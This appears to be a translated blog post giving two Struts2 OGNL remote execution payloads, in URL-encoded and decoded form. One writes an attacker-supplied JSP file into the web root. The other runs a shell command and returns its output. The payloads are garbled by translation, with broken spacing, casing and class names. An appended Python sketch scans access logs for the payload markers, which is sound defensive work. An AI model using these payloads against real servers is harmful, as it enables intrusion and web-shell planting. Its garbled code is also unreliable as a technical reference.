Struts2 Remote Execution Vulnerability
Method 1: Create a new file (he1p.jsp), write your own content into it, and append &data= followed by the file content to the request.

Attack address, URL-encoded:

Attack address? Class. classloader. jarpath = (% 23 context % 5B % 22xwork. methodaccessor. denymethodexecution % 22% 5d % 3d + new + Java. lang. boolean (false) % 2C + % 23_memberaccess % 5B % 22 allowstaticmethodaccess % 22% 5d % 3 dtrue % 2C + % 23req % 3d % 40org. apache. struts2.servletactioncontext % 40 getrequest () % 2C + % 23sb % 3 dnew + Java. lang. stringbuffer () % 2C + % 23sb. append (% 23req. getrealpath ("/") % 2C + % 23sb. append ("he1p. JSP ") % 2C + % 23fos % 3 dnew + Java. io. fileoutpu Tstream (% 23sb. tostring () % 2C + % 23fos. write (% 23req. getparameter ('data '). getbytes () % 2C + % 23 darky % 3d % [email protected] (). getwriter () % 2C + % 23darky. println ("suceessful") % 2C + % 23darky. close () % 2C + % 23fos. close () (aa) & X [(class. classloader. jarpath) ('A')]

Source code after escape (URL-decoded):

Attack address? Class. classloader. jarpath = (# context ["xwork. methodaccessor. denymethodexecution "] = + new + Java. lang. boolean (false), + # _ memberaccess ["allowstaticmethodaccess"] = true, + # [email protected] @ getrequest (), + # sb = new + Java. lang. stringbuffer (), + # sb. append (# req. getrealpath ("/"), + # sb. append ("he1p. JSP "), + # Fos = new + Java. io. fileoutputstream (# sb. tostring (), + # FOS. write (# req. getparameter ('data '). getbytes (), + # [emai L protected] @ getresponse (). getwriter (), + # darky. println ("suceessful"), + # darky. close (), + # FOS. close () (aa) & X [(class. classloader. jarpath) ('A')]

Method 2: Execute a CMD command.

Attack address, URL-encoded:

Attack address? Class. classloader. jarpath = (% 23 context % 5B % 22xwork. methodaccessor. denymethodexecution % 22% 5d % 3d + new + Java. lang. boolean (false) % 2C + % 23_memberaccess % 5B % 22 allowstaticmethodaccess % 22% 5d % 3 dtrue % 2C + % 23 darky % 3d % 40org. apache. struts2.servletactioncontext % 40 getresponse (). getwriter () % 2C + %23myret%3d%40java.lang.runtime%40getruntime(%.exe C ("ls-La") % 2C + % 23is % 3d % 23myret. getinputstream () % 2C + % 23 S % 3d + new + Java. util. Second (% 23is ). usedelimiter ("\ A") % 2C + % 23darky. println (% 23s. next () % 2C + % 23darky. close () (aa) & X [(class. classloader. jarpath) ('A')]

Source code after escape (URL-decoded):

Attack address? Class. classloader. jarpath = (# context ["xwork. methodaccessor. denymethodexecution "] = + new + Java. lang. boolean (false), + # _ memberaccess ["allowstaticmethodaccess"] = true, + # [email protected] @ getresponse (). getwriter (), ++ # [email protectedtime@getruntime(cmd.exe C ("ls-La"), ++ # Is = # myret. getinputstream (), + # S = + new + Java. util. begin (# is ). usedelimiter ("\ A"), + # darky. println (# S. next (), + # darky. close () (aa) & X [(class. classloader. jarpath) ('A')]
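Both payloads above carry the same marker strings in the request's query string, so they can be searched for in web server access logs. The following detection sketch is an added example, not part of the original article; the function names are hypothetical and the log lines are constructed (combined log format is assumed).

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Marker substrings taken from the decoded payloads on this page; matching is
# case-insensitive because the page's copy has lost the original casing.
MARKERS = {
    "classloader-param": r"class\.classloader\.",
    "deny-method-exec": r"xwork\.methodaccessor\.denymethodexecution",
    "member-access": r"#_memberaccess",
    "static-method-access": r"allowstaticmethodaccess",
    "runtime-call": r"java\.lang\.runtime",
    "file-write": r"java\.io\.fileoutputstream",
}
COMPILED = {name: re.compile(rx, re.I) for name, rx in MARKERS.items()}
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD|PUT) (\S+) HTTP/[\d.]+"')

def decode_fully(value, rounds=3):
    """URL-decode repeatedly so double-encoded input is normalised too."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_request_target(target):
    """Return the sorted marker names found in a request target's query string."""
    query = decode_fully(urlsplit(target).query)
    compact = re.sub(r"\s+", "", query)  # ignore whitespace padding in the expression
    return sorted(name for name, rx in COMPILED.items() if rx.search(compact))

def scan_access_log(lines):
    """Yield (client, target, hits) for log lines whose query carries any marker."""
    for line in lines:
        m = REQUEST.match(line)
        if m:
            hits = scan_request_target(m.group(2))
            if hits:
                yield m.group(1), m.group(2), hits

# Constructed sample lines: a shortened marker-bearing request, a benign
# request, and a double-encoded marker.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jul/2014:10:00:01 +0000] "GET /index.action?class.classLoader.jarPath=(%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C+%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue)(aa) HTTP/1.1" 200 512',
    '198.51.100.4 - - [10/Jul/2014:10:00:02 +0000] "GET /index.action?page=2&sort=name HTTP/1.1" 200 1024',
    '203.0.113.9 - - [10/Jul/2014:10:00:03 +0000] "GET /login.action?x=%2523_memberAccess HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for client, target, hits in scan_access_log(SAMPLE_LOG):
        print(client, hits)
```

This only sees what the access log records, so payloads sent in a POST body need the same check applied at a proxy or WAF layer.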
This article is from the "big treasure sweet see" blog; please be sure to keep this source: http://abao0918.blog.51cto.com/1017613/1439049